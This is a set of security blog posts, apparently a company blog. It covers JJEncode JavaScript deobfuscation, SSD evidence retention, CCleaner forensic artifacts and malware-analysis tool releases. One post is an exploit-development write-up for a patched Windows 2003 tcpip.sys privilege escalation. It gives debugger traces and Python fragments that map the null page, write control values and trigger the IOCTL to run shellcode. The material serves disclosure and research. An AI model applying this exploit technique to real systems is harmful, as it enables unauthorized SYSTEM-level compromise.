Brain Bleeding JavaScript Obfuscation

JavaScript is often used to facilitate web-based attacks. To make analysis more difficult and hide from signature-based systems, attackers will often obfuscate their JavaScript. Fortunately, there are many ways to deobfuscate JavaScript, or at least determine what it is doing. Sometimes, however, you come across obfuscated JavaScript that just makes your brain bleed.

UPDATE: Some have requested the actual JS used in this analysis, so here it is:

In the last few days there has been a Dyre (banking trojan) spam campaign with the subject lines "Fax #123456" or "Employee Documents - Internal Use". The emails contain a link to a web page that loads two obfuscated JavaScript files, each of which looks like this:

If there ever was obfuscated JavaScript that made you want to crawl under your desk and cry, this is it.

A common methodology to deobfuscate malicious JavaScript (JS) is to run it in a modified interpreter, such as Didier Stevens' modified SpiderMonkey. These programs run the obfuscated JavaScript and capture the output of eval() or document.write() calls, which obfuscated scripts often rely on.

Unfortunately, there are times these programs don't work. When that happens, if you want to see the deobfuscated code you have to do some manual analysis. This post will illustrate how to manually decode the JavaScript from this attack.

JJEncode

This obfuscated JavaScript is encoded using JJEncode, a JavaScript encoder. Unfortunately, I did not realize this until halfway through manual decoding. There is an excellent paper on how JJEncode works by Peter Ferrie, and two automated deobfuscation tools by Jacob Soo and Nahuel Riva. Any duplication of information from these resources is accidental.

Despite the availability of these resources, it is still worth examining how the JJEncoded JavaScript can be manually decoded so you can use these techniques in future deobfuscation attempts.

The Obfuscated Code

This JavaScript hurts to look at - mostly due to the lack of line breaks and the obfuscated variable names. However, if we examine the code one line at a time, we will start to get an idea of what it is doing. Code beautifiers, like JS Nice, work great for inserting line breaks automatically. Doing so with the obfuscated JavaScript shows that we are dealing with only 6 lines of code.

As we shall see during the analysis, JJEncode is essentially a substitution encoding that goes through three phases:

  • Initialization, where characters and values are assigned to variables.
  • Substitution, where the variables are used to construct code.
  • Execution, where the constructed code is executed.

As each line is analyzed, we will see these phases and construct the deobfuscated code.

Line 1

The first line consists of:

$ = ~[];

JavaScript variable names are pretty flexible in the characters that can be used, so the above variable name of "$" is a valid name. Unlike a number of other languages, such as Perl, the dollar sign is not a reserved character and can therefore be used in any part of a variable name. This allows the other variable names we'll see in this JS, such as $_, $$$, and _$_.

Line 1 is an assignment statement, assigning the value of ~[] to the variable $. The tilde character is a bitwise NOT operation, and the [] signifies an empty JavaScript array. What happens when you NOT an array? The array is first coerced to a number: [] converts to the empty string "", which converts to 0, and ~0 is -1.

So, this statement assigns -1 to the variable $.

Line 2

The second line is a bit longer, but broken up we see:

$ = {
  ___ : ++$,
  $$$$ : (![] + "")[$],
  __$ : ++$,
  $_$_ : (![] + "")[$],
  _$_ : ++$,
  $_$$ : ({} + "")[$],
  $$_$ : ($[$] + "")[$],
  _$$ : ++$,
  $$$_ : (!"" + "")[$],
  $__ : ++$,
  $_$ : ++$,
  $$__ : ({} + "")[$],
  $$_ : ++$,
  $$$ : ++$,
  $___ : ++$,
  $__$ : ++$
};

In this line, $ is being reassigned to a JavaScript object, as denoted by the curly braces. Properties of the object are defined within the braces in the form "name : value", and individual properties are separated by commas.

The first property is ___ (3 underscores), or its full name, $.___. The value of this property is ++$, which takes the value of $ (currently -1), increments it (to 0), and then assigns it to the property. So, in this statement, $ is incremented by one to 0 and then assigned to $.___. Note that since the object is still being built, $ is still a number and not an object yet.

The second property is $$$$. The value of this property is (![] + "")[$].

The first part of this value is (![] + ""). ![] is an empty array that is logically NOT'd, which yields the boolean value false. Concatenating it with an empty string converts the value to a string. Therefore, (![] + "") evaluates to the string "false".

However, there is a [$] after the string "false". In JavaScript, a character of a string can be obtained by specifying the index of the character within brackets (string positions start at 0) [1]. Here, $ currently evaluates to 0, so this line is asking for the character at position 0 in the string "false", or "f".

Iterations for the explanation above are shown below to better illustrate the process.

$$$$ : (![] + "")[$]
1. $$$$ : (false + "")[$]
2. $$$$ : ("false")[$]
3. $$$$ : ("false")[0]
4. $$$$ : "f"

The rest of the object properties are constructed in a similar fashion: incrementing the $ variable, constructing a string, and grabbing a character out of the string by specifying its index.

After decoding all of the object, the values look as such:

$ = {
  ___  : 0,
  $$$$ : "f",
  __$  : 1,
  $_$_ : "a",
  _$_  : 2,
  $_$$ : "b",
  $$_$ : "d",
  _$$  : 3,
  $$$_ : "e",
  $__  : 4,
  $_$  : 5,
  $$__ : "c",
  $$_  : 6,
  $$$  : 7,
  $___ : 8,
  $__$ : 9
};

What do we have? The hexadecimal alphabet! The purpose of this whole statement was to produce the hexadecimal alphabet for use in the later substitutions.

Line 3

The next three lines construct more variables used for substitution. Line 3 (broken up for easier viewing) is:

$.$_=($.$_=$+"")[5]+
     ($._$=$.$_[1])+
     ($.$$=($.$+"")[1])+
     ((!$)+"")[3]+
     ($.__=$.$_[6])+
     ($.$=(!""+"")[1])+
     ($._=(!""+"")[2])+
     $.$_[5]+
     $.__+
     $._$+
     $.$;

This is an assignment to a new property in the $ object, $.$_. The value of the property is constructed by concatenating values together, as denoted by the plus operator. Each value is grabbing a character using an index, so this is likely a string being constructed. We can evaluate each of the values to get the entire string.

  1. The first character is ($.$_=$+"")[5]. This operation assigns the value of $+"" to $.$_, then takes the 6th character (index 5 is the 6th character). $+"" is the string "[object Object]", and the 6th character is "c".

  2. The second character is ($._$=$.$_[1]). $.$_ was previously assigned the value of "[object Object]", so the 2nd character (index 1) is "o". Note this also assigns "o" to $._$.

  3. Third, we have ($.$$=($.$+"")[1]) which assigns a value to $.$$. The value assigned is ($.$+"")[1]. $.$ has not been seen yet, so it is undefined, thus creating the string "undefined". The second letter is "n", so "n" is assigned to $.$$.

  4. Fourth is ((!$)+"")[3]. This obtains the 4th letter of the string created by ((!$)+""). Performing a boolean NOT (the '!' operator) on an object returns false, so the string "false" is created. The fourth letter is "s".

  5. ($.__=$.$_[6]) is the fifth operation, which assigns the 7th letter of $.$_ (the string "[object Object]") to $.__. The 7th letter is "t".

  6. Sixth, ($.$=(!""+"")[1]) assigns a value to $.$. The value assigned is the 2nd letter of !""+"". In JavaScript, an empty string is considered another representation of false, so a logical NOT of it yields the value true. The operation !""+"" creates the string "true", the 2nd letter of which is "r".

  7. The seventh operation, ($._=(!""+"")[2]), gets the 3rd character from the same string ("true"), "u", and assigns it to $._.

  8. Eighth, the 6th character of $.$_ ("[object Object]") is obtained, "c".

  9. The last three characters are composed of object properties that have already been assigned values: $.__, $._$, and $.$. These values are "t", "o", and "r", respectively.

In the end, this line of code creates the string "constructor" and assigns it to $.$_.

Line 4

Lines 4 and 5 construct two strings in a similar fashion.

Line 4's string is constructed through the code:

$.$$=$.$+
     (!""+"")[3]+
     $.__+
     $._+
     $.$+
     $.$$;

Most of the characters in the string use previously assigned values that we can substitute in, giving us:

$.$$="r"+(!""+"")[3]+"t"+"u"+"r"+"n"

The only letter not substituted is constructed through (!""+"")[3]. This is the operation that returns the string "true", the fourth character of which is "e". So, this line creates the string "return".

Line 5

The last string constructed is on line 5:

$.$=(0)[$.$_][$.$_];

$.$_ is equal to the word "constructor", so we have the operation (0)["constructor"]["constructor"]. Typing that into a JavaScript interpreter returns the following function:

function Function() { [native code] }

This is creating a JavaScript function definition. Since this was not passed any data, the function itself is empty. However, if we were to pass a string of JavaScript code into it, as shown in the example below, we would create an anonymous JavaScript function:

js> (0)["constructor"]["constructor"]("alert ('hi!');")
function anonymous() {
    alert("hi!");
}

For the purposes of our decoding, this statement is creating a function and we can substitute the function keyword when we see $.$ later in the obfuscated JavaScript.

For those keeping track, our $ object now has the following values:

$ = {
  ___  : 0,
  $$$$ : "f",
  __$  : 1,
  $_$_ : "a",
  _$_  : 2,
  $_$$ : "b",
  $$_$ : "d",
  _$$  : 3,
  $$$_ : "e",
  $__  : 4,
  $_$  : 5,
  $$__ : "c",
  $$_  : 6,
  $$$  : 7,
  $___ : 8,
  $__$ : 9,
  $_   : "constructor",
  _$   : "o",
  $$   : "return",
  __   : "t",
  _    : "u",
  $    : function
};

Note that $.$$ briefly held "n" during line 3 before line 4 overwrote it with "return", and $.$ held "r" before line 5 replaced it with the Function constructor.

Line 6

At this point we have performed all of the data initialization. Line 6 is where the substitution and execution of the deobfuscated code occurs. This happens simultaneously in the JavaScript code, but we can separate it out to view what is occurring. By substituting in the values we know about, we get a clearer picture of what the code is doing.

Note that you have to be careful when doing this, as a simple search and replace cannot be performed without the risk of substituting incorrect values. Performing the substitution is left as an exercise for the reader, but when done you will get the following code.

As seen above, line 6 creates an anonymous function that is then executed. The function's code is created by substituting values that were constructed earlier in the JavaScript. Since this code is currently a string of concatenations, we can bring the string together to be a bit more readable.

The code still isn't entirely clear, but it is much better than before.

A number of characters in the obfuscated code above are in the format backslash followed by a number. In JavaScript, this is the format used to represent a character by its octal (base 8) value.

The octal values can be replaced with their ASCII equivalents to remove this level of obfuscation. This leaves us with the unobfuscated code that is executed within the anonymous function.
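The replacement is easy to script. As a minimal sketch in Python (assuming the constructed string has been captured as literal text, i.e., a backslash followed by one to three octal digits), the escapes can be expanded like this:

import re

def decode_octal_escapes(s):
    # Replace each \NNN sequence (one to three octal digits) with its character.
    return re.sub(r'\\([0-7]{1,3})', lambda m: chr(int(m.group(1), 8)), s)

print(decode_octal_escapes(r'\141\154\145\162\164'))  # prints: alert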

Conclusion

The JJEncoded JavaScript looks daunting (and brain bleeding) at first. The obfuscation makes use of non-standard, repetitive variable names and strings constructed in odd ways to make analysts think it is much harder to deobfuscate than it actually is. However, by moving slowly and taking the code one line at a time, we can remove the obfuscation to get at the actual code beneath.

While there are automatic decoders for JJEncode available, the next obfuscation technique you come across might not have a decoder. Tools help, but they only get so far and won't work all the time, so being able to perform deobfuscation manually is a skill worth having.

Notes

1. Interesting to note, using indexes to obtain string characters was not always a standard JavaScript feature, and therefore may not work in older browsers.

Giles 3.0.0 Released

The Giles production rule system compiler has just been released! It is available for download here.

Production rule systems (or "engines" in Giles parlance) are tools that are commonly used to efficiently find patterns in streams of data where any number of data items (or "facts") can be added or removed over time. They're very commonly used to perform complex behavior detection (i.e., event correlation), like fraud detection for credit cards via transaction history or multi-part attacks against servers via combined analysis of firewall and server logs. They can also be used to provide some form of artificial intelligence, forming the core of many expert systems and automated planners.

All that sounds great, but what is Giles?

Well, first off, let me explain the motivation behind Giles. Traditionally, production rule systems are either standalone, or complex packages with APIs accessible from only a handful of languages. We wanted to build a new breed of compiler that lets users create engines that are accessible from any programming language and easily embedded inside larger projects. To that end, we created Giles.

Giles's claim to fame is that it can turn a normal relational database (SQLite in the current release) into a production rule system (engine). It does this by compiling a description of the engine into a database schema. Databases created using this schema instantly become the described engine, with no additional software or driver program needed.

This approach has immediate advantages, the most important being that any language that can access the database can be used to access and drive the engine. This makes it much easier to embed complex event correlation, artificial intelligence, and automated planning inside larger applications. Another interesting benefit is that these production systems can take advantage of the underlying database's data-safety guarantees (e.g., transactions, data durability, etc.). Finally, these production systems can handle terabytes of data, survive system crashes, and be run over long periods of time.

Production rule systems are often considered esoteric or hard to understand or use. But don't let that hold you back. One of our goals is to make these powerful computational tools more accessible to a wider audience. The distribution tar ball includes several examples that you can experiment with.

In conclusion, I hope all this sounds interesting to you. If it does, please download Giles, read the documentation, and give the examples a try. Also, stay tuned to the KoreLogic Blog where we will post various worked examples, tips, and tricks in the days ahead.

Windows 2003 Privilege Escalation via tcpip.sys

In my post for today, I will be discussing a vulnerability that I found in the TCP/IP driver (tcpip.sys) of Microsoft's Windows 2003 operating system with Service Pack 2 installed (advisory here). If an attacker has obtained unprivileged access to the operating system, this vulnerability may be used to elevate their privileges to those of SYSTEM. This is accomplished by abusing a near-null pointer dereference within code that runs during the processing of a specific unprivileged IOCTL call.

This vulnerability was issued identifiers: KL-001-2015-001, MS14-070, and CVE-2014-4076.

In order to avoid duplicating content from the advisory issued for this vulnerability, I will only provide a brief tl;dr before diving into the exploit.

By using nt!NtDeviceIoControlFile(), it is possible to leverage a handle to the Tcp device, along with the IOCTL code 0x00120028 and a specific input buffer, to trigger a near-null pointer dereference through the ESI (extended source index) register. This register is used as a pointer to memory containing a dword that determines the code path to be taken. This can be abused through a combination of reverse engineering (in order to understand what values have what effect on code flow) and attacker memory allocation near null.

In this post, I will discuss in detail the methodology leveraged during exploit development. I would like to note that Microsoft has confirmed this vulnerability exists on the x86, x64, and Itanium architectures. I will only focus on the x86 architecture in this post.

The original crash that led to the exploitation of this vulnerability was found as such:

ErrCode = 00000000
eax=00000000 ebx=859ef888 ecx=00000008 edx=00000100 esi=00000000 edi=80a58270
eip=f67ebbbd esp=f620a9c8 ebp=f620a9dc iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010246
tcpip!SetAddrOptions+0x1d:
f67ebbbd 8b5e28          mov     ebx,dword ptr [esi+28h] ds:0023:00000028=????????

The ???????? indicates that the memory being referenced is not allocated and therefore cannot be copied from. The ESI register contains 0x00000000, a value that is user-controlled during the IOCTL call. By modifying that value, it is possible for an attacker to control memory used during decisions by the driver relating to code flow. This allows an attacker to influence those decisions in a way that benefits him. Let's review some of what that looks like.

kd> p
tcpip!SetAddrOptions+0x2b:
ba9fca65 f6c340          test    bl,40h
kd> p
tcpip!SetAddrOptions+0x2e:
ba9fca68 7567            jne     tcpip!SetAddrOptions+0x9e (ba9fcad1)
kd> p
tcpip!SetAddrOptions+0x30:
ba9fca6a 66837e3800      cmp     word ptr [esi+38h],0
kd> p
tcpip!SetAddrOptions+0x35:
ba9fca6f 7560            jne     tcpip!SetAddrOptions+0x9e (ba9fcad1)
kd> r;p

The BL register contains the last byte in a dword value obtained from ESI+28, or 0x00000028. No problems there, we'll just write any four-byte value we like there. In my exploit, I ended up with the following:

ret_two = WriteProcessMemory(-1, 0x28, "\x87\xff\xff\x38", 4, byref(c_int(0)))

Only the first and last bytes are really needed to accomplish exploitation. I did not go any further to figure out the meaning of the inner two bytes.

The last byte is tested first using this instruction:

test bl, 40h

Basically, this becomes a bitwise AND (i.e., 0x38 & 0x40), which evaluates to zero, so the conditional jump is not taken. The second test is then encountered. This test determines whether the word pointer at 0x00000038 is 0x0000 or not. Since this also falls within the range of memory that I can write to, my exploit does the following:

ret_three = WriteProcessMemory(-1, 0x38, "\x00"*2, 2, byref(c_int(0)))

So far so good; this gets me to a code block that makes a call into tcpip!IsBlockingAOOption.

kd> p
tcpip!SetAddrOptions+0x37:
ba9fca71 ff75f8          push    dword ptr [ebp-8]    ss:0010:b9c5db78=00000200
kd> p
tcpip!SetAddrOptions+0x3a:
ba9fca74 ff750c          push    dword ptr [ebp+0Ch]  ss:0010:b9c5db8c=00000022
kd> p
tcpip!SetAddrOptions+0x3d:
ba9fca77 e8f588ffff      call    tcpip!IsBlockingAOOption (ba9f5371)
kd> p
tcpip!SetAddrOptions+03e:
ba9d4a7c 84c0            test    al,al

This code does a bitwise AND operation on the AL register. The value of the AL register is set as a result of the call to tcpip!IsBlockingAOOption. This code leverages the EAX register, which also becomes tainted with a null value earlier on in the code flow.

From here, we can release code flow until the instruction pointer is dereferenced.

eax=00000010 ebx=80a58290 ecx=00000000 edx=00000000 esi=00000000 edi=00000000
eip=baa07ee2 esp=b9b12b48 ebp=b9b12b60 iopl=0         nv up ei ng nz na pe cy
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000287
tcpip!ProcessAORequests+0x144:
baa07ee2 8b86ec000000    mov     eax,dword ptr [esi+0ECh] ds:0023:000000ec=00000000
kd> p
...
eax=00000000 ebx=80a58290 ecx=00000008 edx=00000000 esi=00000000 edi=00000000
eip=baa07ef3 esp=b9b12b48 ebp=b9b12b60 iopl=0         nv up ei pl nz na po nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000202
tcpip!ProcessAORequests+0x155:
baa07ef3 8945f4          mov     dword ptr [ebp-0Ch],eax ss:0010:b9b12b54=baa07da3
kd> p
...
kd> db [ebp-0c] L?0x4
b9b12b54  00 00 00 00                                      ....
kd> r;p
eax=00000000 ebx=80a58290 ecx=00000002 edx=00000000 esi=00000000 edi=00000000
eip=baa07efa esp=b9b12b40 ebp=b9b12b60 iopl=0         nv up ei pl zr na pe nc
cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00000246
tcpip!ProcessAORequests+0x15c:
baa07efa ff55f4          call    dword ptr [ebp-0Ch]  ss:0010:b9b12b54=00000000
Illegal instruction - code c000001d (!!! second chance !!!)
0000002a ff              ???

tl;dr

mov     eax,dword ptr [esi+0ECh] ds:0023:000000ec=00000000
mov     dword ptr [ebp-0Ch],eax ss:0010:b9b12b54=baa07da3
call    dword ptr [ebp-0Ch]  ss:0010:b9b12b54=00000000

Now we need to get the pointer landing somewhere nice and place some fun shellcode there to be executed.

ret_one = NtAllocateVirtualMemory(-1,byref(c_int(0x1000)),0x0,byref(c_int(0x1000)),0x1000|0x2000,0x40)
ret_five = WriteProcessMemory(-1, 0x2b, "\x00"*2, 2, byref(c_int(0)))
ret_six = WriteProcessMemory(-1, 0x2000, sc, len(sc), byref(c_int(0)))

Writing 0x0000 at 0x2b changes the EIP value to 0x2000, so we can have our shellcode waiting at 0x2000. An alternative to this would be to write a dword pointer to your shellcode at 0x000000ec. Both cases act as a trampoline into the shellcode.

Then, an attacker only needs to issue the following call:

DeviceIoControlFile(handle,NULL,NULL,NULL,byref(c_ulong(8)),0x00120028,0x1100,len(buf),0x0,0x0)
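The Python snippets in this post assume ctypes bindings along the following lines; this is a minimal, hypothetical sketch, and the complete exploit (including obtaining the handle to the Tcp device and the shellcode) is in the published advisory:

from ctypes import windll, byref, c_int, c_ulong

# Hypothetical bindings for the calls used in the snippets above; -1 is the
# pseudo-handle for the current process passed as the first argument.
NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory
WriteProcessMemory      = windll.kernel32.WriteProcessMemory
DeviceIoControlFile     = windll.ntdll.NtDeviceIoControlFile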

A Metasploit module to leverage this vulnerability has been released by another member of our team along with this blog post; pull request here. In the meantime, exploit code written in Python can be found in the advisory we published.

Cheers, Matt

SSD Storage - Ignorance of Technology is No Excuse

Digital evidence storage for legal matters is a common practice. As the use of Solid State Drives (SSD) in consumer and enterprise computers has increased, so too has the number of SSDs in storage increased. When most, if not all, of the drives in storage were mechanical, there was little chance of silent data corruption as long as the environment in the storage enclosure maintained reasonable thresholds. The same is not true for SSDs.

A stored SSD, without power, can start to lose data in as little as a single week on the shelf.

SSDs have a shelf life. They need consistent access to a power source in order for them to not lose data over time. There are a number of factors that influence the non-powered retention period that an SSD has before potential data loss. These factors include the amount of use the drive has already experienced, the temperature of the storage environment, and the materials that comprise the memory chips in the drive.

The Joint Electron Device Engineering Council (JEDEC) defines standards for the microelectronics industry, including standards for SSDs. One of those standards is an endurance rating. One requirement of this rating is that an SSD retain data with power off for the period required for its application class.

For client application SSDs, the powered-off retention period standard is one year while enterprise application SSDs have a powered-off retention period of three months. These retention periods can vary greatly depending on the temperature of the storage area that houses SSDs.

In a presentation by Alvin Cox on JEDEC's website titled "JEDEC SSD Specifications Explained" [PDF warning], graphs on slide 27 show that for every 5 degrees C (9 degrees F) rise in temperature where the SSD is stored, the retention period is approximately halved. For example, if a client application SSD is stored at 25 degrees C (77 degrees F) it should last about 2 years on the shelf under optimal conditions. If that temperature goes up 5 degrees C, the storage standard drops to 1 year.

The standards change dramatically when you consider JEDEC's standards for enterprise class drives. The storage standard for this class of drive at the same operating temperature as the consumer class drive drops from 2 years under optimal conditions to 20 weeks. Five degrees of temperature rise in the storage environment drops the data retention period to 10 weeks. Overall, JEDEC lists a 3-month period of data retention as the standard for enterprise class drives.
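To put the halving rule in perspective, here is a rough back-of-the-envelope sketch in Python; the baselines are the JEDEC figures cited above, and actual drives will vary:

# Retention is roughly halved for every 5 degrees C of additional storage
# temperature, per the JEDEC slides referenced above.
def retention_weeks(baseline_weeks, baseline_temp_c, storage_temp_c):
    return baseline_weeks * 0.5 ** ((storage_temp_c - baseline_temp_c) / 5.0)

print(retention_weeks(104, 25, 25))  # client drive at 25 C: ~104 weeks (2 years)
print(retention_weeks(104, 25, 30))  # client drive at 30 C: ~52 weeks (1 year)
print(retention_weeks(20, 25, 30))   # enterprise drive at 30 C: ~10 weeks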

A check of various drive manufacturers, in this case Samsung, Intel, and Seagate, shows that their ratings for data retention of their consumer class drives are what would be expected for JEDEC's enterprise class drive standards. All three quote a nominal 3-month retention time period. Most likely, the manufacturers are being conservative; however, it demonstrates the potential variability the manufacturers associate with data retention on any SSD in storage.

When you receive a computer system for storage in legal hold, drive operating and ambient storage temperature are probably not the first things on tap to consider. You cannot control the materials that comprise the drive and the prior use of the drive. You can control the ambient temperature of the storage which will potentially aid in data retention. You can also ensure that power is supplied to the drives while in storage. More importantly, you can control how the actual data is retained.

The easiest way to manage the problem is to image the drive in a timely manner. If long term storage is required, image the SSD onto a mechanical drive and place that drive in storage as well as the SSD. If you maintain an online legal hold storage capability, image the SSD to that storage. Either way, you essentially eliminate potential data retention problems. The worst-case scenario is explaining to the court why your data cannot be accessed because the hard drive you placed into storage is throwing out errors.

What started this look into SSDs? An imaging job of a laptop SSD left in storage for well over the 3-month minimum retention period quoted by the manufacturer of the drive before it was turned over to us. This drive had a large number of bad sectors identified during the imaging period. Not knowing the history, I did not consider the possibility of data loss due to the drive being in storage. Later, I learned that the drive was functioning well when it had been placed into storage. When returned to its owner a couple of months after the imaging, the system would not even recognize the drive as a valid boot device. Fortunately, the user data and files were preserved in the drive image that had been taken, thus there was no net loss.

Now imagine a situation in which an SSD was stored in legal hold where the data was no longer available for imaging, much less use in court. Ignorance of the technology is no excuse, and I am sure the opposing counsel would enjoy the opportunity to let the court know of the "negligent" evidence handling in the matter.

Bottom line - image it now … and use a mechanical disk.

MASTIFF Online Free 1.0.0 Released

KoreLogic is pleased to announce the release of MASTIFF Online, a web interface into the open source MASTIFF static analysis framework. With this free online tool, anyone can upload files to be examined by MASTIFF, returning the results within minutes. MASTIFF Online can be accessed at https://mastiff-online.korelogic.com.

MASTIFF was created by KoreLogic through the DARPA Cyber Fast Track program. The purpose of MASTIFF is to provide an automated framework through which analysts can quickly run static analysis techniques, such as embedded strings and PE header analysis, against a potentially malicious file. Written in Python, MASTIFF can be quickly expanded to take on new types of files or add new analysis techniques. Unlike other malware analysis frameworks, MASTIFF focuses solely on static analysis (examining the characteristics of files), and not dynamic analysis (examining the behavior of files).

MASTIFF Online was created to meet the needs of users for a web interface to the framework. Using the KoreLogic Rapid Application Development (KRAD) service, KoreLogic was able to construct the web front-end in a short amount of time and push it out for public use.

Currently, MASTIFF Online supports a number of file types and utilizes a number of static analysis techniques, including:

  • PE Header Analysis
  • Embedded Strings Analysis
  • Single-byte String Extraction
  • PE Resource Analysis
  • Anti-virus Results based on hash
  • Malicious PDF Object Detection
  • Microsoft Office Shellcode Detection
  • ...and many others

MASTIFF Online can be accessed at https://mastiff-online.korelogic.com.

The source code for MASTIFF can be downloaded at https://git.korelogic.com/mastiff.git/.

The framework is a work in progress and new analysis types and techniques will be continually added. If you have any questions, comments, or suggestions for improvement, please contact the development team at mastiff-online@korelogic.com.

What Did CCleaner Wipe?

The use of CCleaner is encountered at times during forensic investigations of computer systems. It has been labeled an "anti-forensics" tool as it has a secure deletion mode where it can overwrite data, filenames, and free space.

Overwriting files and filenames removes the chance to recover the data and subject it to further analysis; hence, the anti-forensics label. There may be some remnants and data left for analysis and comparison, but at best you can infer what had been wiped. What you are faced with is a case of "You don't know what you don't know".

That is, until now. CCleaner will actually tell you what files it wiped. You just have to work for it.

CCleaner is a system optimization software package developed and distributed by Piriform. A free version is available for download and use. Piriform describes the capabilities of CCleaner as follows:

"CCleaner is our system optimization, privacy and cleaning tool. It removes unused files from your system - allowing Windows to run faster and freeing up valuable hard disk space. It also cleans traces of your online activities such as your Internet history. Additionally it contains a fully featured registry cleaner. But the best part is that it's fast (normally taking less than a second to run) and contains NO Spyware or Adware!

CCleaner does leave a few artifacts that may be uncovered. The character patterns of overwriting, the registry values for its configuration settings, and the data still resident in the pagefile, volume shadows, and hibernation files after its use have been reported on various other sites.

CCleaner, in what Piriform refers to as "secure file deletion" mode, overwrites a file's content with other characters. There are multiple options available in this mode with each option increasing the number of times a file is overwritten. Even the "simple overwrite" option consisting of one pass over the data is enough to frustrate recovery of the original data.

Filenames are overwritten as well. On an NTFS formatted drive, the filename records in the Master File Table are replaced with the letter "Z". For example, a file named "TEST.TXT" will have each character in the name overwritten with the letter Z and will be renamed to "ZZZZ.ZZZ" after the process is completed.

CCleaner, even on its most aggressive settings, will possibly leave some information in the pagefile, volume shadows, and hibernation files on a system. A forensics examiner could recover Internet History as well as other remnants from these areas as they have not been overwritten by CCleaner.

When trying to gather information on data overwritten by CCleaner, files resident in volume shadows will allow you to infer what may have been overwritten. The same is true for files and filenames located in pagefiles and hibernation files. The registry entries for CCleaner's configuration settings will indicate the types of files and some locations of files that will be affected, but do not directly tell you the names of the files, much less their content. The difficulty is in establishing a link between the data you believe CCleaner overwrote and the data actually overwritten by the program.

For example, in a recent case, filenames and file paths recovered from a hibernation file referenced a few thousand files that were no longer resident on the system. Fortunately, the system had gone into hibernation shortly before the wiping, so the timing was good, allowing for a comparison of filenames found in the hibernation file to filenames active on the system.

The configuration settings for CCleaner allowed one to infer that many of these files were potentially files wiped by CCleaner. However, deletion in the normal course of events for the system, such as when the Internet cache size has been exceeded, could not be entirely excluded.

To try to address the question of what CCleaner wiped, testing was performed on a clean system to observe and monitor how CCleaner operates. This testing uncovered an artifact of what appears to be how CCleaner handles the overwriting of filenames on a system. As stated previously, CCleaner will overwrite letters in a filename with the letter "Z". In the process of performing this task, CCleaner writes out the filename it intends to replace multiple times, followed by filenames of the same length consisting entirely of Z's.

For example, as CCleaner was executing, the filename "TEST.TXT" was seen being written out to disk a few times, followed by the pattern "ZZZZ.ZZZ". The other filenames being overwritten were handled in the same fashion. A forensic image of the system was taken after the execution of CCleaner had completed and was searched for the pattern noticed in testing. A match of this pattern was found in the unallocated space of the hard drive.

The search results looked like this:

TEST.TXT
TEST.TXT
TEST.TXT
ZZZZ.ZZZ
ZZZZ.ZZZ
ZZZZ.ZZZ

TEST1.TXT
TEST1.TXT
TEST1.TXT
ZZZZZ.ZZZ
ZZZZZ.ZZZ
ZZZZZ.ZZZ

And so forth…

In order to ensure that the monitoring programs did not affect this finding, the same test was run again on a clean system without the monitoring tools in place. Once again, the pattern was located in the unallocated portion of the hard drive. Even after varying settings for CCleaner, positive findings for this pattern were located on the hard drive. Only when the free space overwriting option was selected did most of the artifacts go away. Some items were still found in the pagefile; however, these were quite few compared to the amount previously located.

The real test took place when a search for this pattern was conducted on the hard drive in the case mentioned previously. Success!

Positive hits were found on the drive and were quite extensive. In fact, of the few thousand filenames referenced in the hibernation file that were no longer resident on the system, over 80% were located and associated with these CCleaner artifacts.

So, we had positive correlation of roughly 80% of the unique filenames found in the hibernation file impacted by CCleaner running on the system.

Once a filename is located, even if the original file is overwritten, it is still possible to gather more information regarding that file. Remnants and even whole copies of files may be located once a filename is identified. If you have a filename, searches for that name will turn up interesting and informative results.

In this case, finding this artifact in CCleaner led to the identification of multiple key elements. In every case since this one involving CCleaner, this pattern has allowed the correlation of at least some information about files that were wiped. Unfortunately, this search will not allow one to completely locate all of the filenames of files that were overwritten, or necessarily lead to recovering their data.

More information, including our timeline of attempts to contact the vendor, is available in the advisory we published.

To quote the Rolling Stones song from the "Let It Bleed" album:

"You can't always get what you want. But if you try sometime, you find, you get what you need."

One Month of MASTIFF Online!

It has been exactly one month since MASTIFF Online was opened, and to celebrate, we have released the next stable version of MASTIFF! Version 0.7.1 includes a large number of bug fixes, as well as some new analysis plug-ins to get more information out of the files you are analyzing. The new version can be found at https://git.korelogic.com/mastiff.git/.

MASTIFF 0.7.1

Most of the code in this release has been in the git repository for some time now. Remember, you can always download the latest code to try out any new features and plug-ins that have been added.

What has changed since the last stable version of MASTIFF? A lot. Here is a brief list of major changes:

  • Tons of bug fixes.
  • Plug-ins have been moved to a central directory, so you no longer have to specify their location in the MASTIFF config file.
  • A hex dump analysis plug-in was added to render the file in hex output.
  • A Metascan Online plug-in was added to query the Metascan site. Note, however, that you will need an API key to query that site.
  • Yara signatures are now also used to determine file type in the category plug-ins.
  • When running setup.py to install MASTIFF, the configuration file will now be installed into /etc/mastiff so it is detected by default.

Expect more great things to come from MASTIFF in the near future, including output plug-ins!

MASTIFF Online

In the past month, we have seen a lot of activity surrounding MASTIFF Online. The response has been overwhelmingly positive, and we have received many submissions to the site. Even more important, the submission rate has been fairly steady, and we continue to analyze new malware each day.

Some statistics about our first month of operation:

  • At last check, we have received 526 files to analyze. The vast majority have been Windows PE executables, followed by PDFs and Office documents. However, we've also received a number of ELF executables. We are looking to expand the analysis offerings for all of these file types to make the site more useful.
  • The United States leads the number of uploads to the site, followed by Brazil and Spain.
  • MASTIFF Online has been visited by over 900 unique IP addresses since it opened. The U.S. leads this statistic as well, followed by Great Britain and Spain.

This may not seem like a lot of files or visits, but MASTIFF Online is still a new site and the fact that we are seeing a steady amount of traffic is a good indicator of its usefulness.

How to Contribute

As time goes on, we plan on adding more features to both MASTIFF and MASTIFF Online. However, to do so, we need feedback from the community. Let us know what you would like to see in the project. The more feedback we receive, the better we can prioritize the feature enhancements we are working on.

Send feedback or suggestions to mastiff-online@korelogic.com.

Don't forget that you can always write new plug-ins for MASTIFF and submit them to the git repository.

The WebJob Framework: An Endpoint Security Solution

The WebJob framework is a next generation endpoint security solution that, from a centralized management location, can execute virtually any program on an arbitrary number of end systems at any time. This framework has been deployed in a number of production environments including the Federal government and Fortune 500 businesses to perform various activities such as evidence collection, enterprise searches, incident response, live forensics, system management and monitoring, and grid computing.

